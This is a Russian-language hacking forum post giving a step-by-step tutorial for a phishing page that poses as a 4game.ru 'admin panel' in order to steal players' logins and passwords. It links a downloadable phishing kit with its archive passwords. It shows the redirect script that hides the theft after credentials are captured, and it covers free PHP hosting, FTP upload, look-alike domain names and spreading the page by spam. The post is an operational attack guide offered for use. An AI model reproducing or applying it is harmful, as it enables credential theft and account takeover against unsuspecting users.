DENISSISS
Offline | Дата: Четверг, 20.10.2011, 21:31 | Сообщение # 1; Репутация DENISSISS: "2947"; Титул DENISSISS: Создатель, Генералиссимус; |
Делаем крутой фейк. [hide=50] Если кто не вкурсе - админ панель это популярная легенда, среди школоты. С помощью нее можно разбанит/забанить любой акк. А я собственно, переделал фейк 4game.ru под админ панель. Разбираем фейк. Фейк предельно прост, если не хотите ничего менять можно юзать сразу.Без настроек. 1)Скачиваем архив с фейком Кликабельно
РЕЗЕРВ АРХИВА БЕЗ ПАРОЛЯ: http://gamexak-wh.3dn.ru/1313854368_www.rar
Пароль на скачку PbHaCk Пароль к архиву hack-fuck.tk Файл send.php отвечает за переадресацию жертвы после ввода данных. Code <html> <script> function lol(){ location.href="https://support.4game.ru";} </script> <body onload="lol();"> </body> </html> Как видите, я поставил переадресацию на support.4game.ru, можете поставить 4game.ru, тогда, если пароль сохранен в браузере жертва попадет в свой профиль, а введенный пароль и логин будет уже у нас, что вряд ли заподозрят. Введенные логины и пароли сохраняются в файл hack-fuck.tk.diz. Установка. Для установки нам подойдет любой хостинг с поддержкой php, я использую бесплатный hut.ru. После регистрации вам дадут данные для доступа по ftp. Для доступа я использую прогу Filezila. Подключившись вы увидите на сервере папку WWW, в нее нужно скопировать наши файлы. Собственно все, проверьте, введя свой домен и введя любые данные, сохраняются ли они. если вы ничего не модифицировали сайт будет выглядеть так:
Заключение. При регистрации на хостинге делайте домен перекликающийся с 4game или adminpanel. Лично я регистрирую левый адрес, потом прикручиваю более красивый, так как домен 4game.hut.ru у многих вызовет подозрение.Но не у всех. Как впаривать эту панель - воля ваша, если ничего умней не придумали - спамьте в игре или на сайтах (только не на хак-факе ). Знайте, что ваш фейк не вечен, он будет стоять пока вас не арестуют хостинг его не спалит и не удалит. Мой простоял долго, 3-4 месяца. Удачной охоты! З.Ы. Народная мудрость: Без лоха и жизнь плоха!
П.С, копипаст
[/hide]
|
| |
|
|
Эти 0 пользователя(ей) поблагодарили DENISSISS за это полезное сообщение: |
|
|
Просто
Offline | Дата: Пятница, 21.10.2011, 14:01 | Сообщение # 2; Репутация Просто: "64"; Титул Просто: Лейтенант; |
Баги для читера - средство выживания... Баги для админа - Веревка и мыло...;) если заслуживаю не желейте поставте +
И сново я вернулся
| |
|
|
Эти 0 пользователя(ей) поблагодарили Просто за это полезное сообщение: |
|
|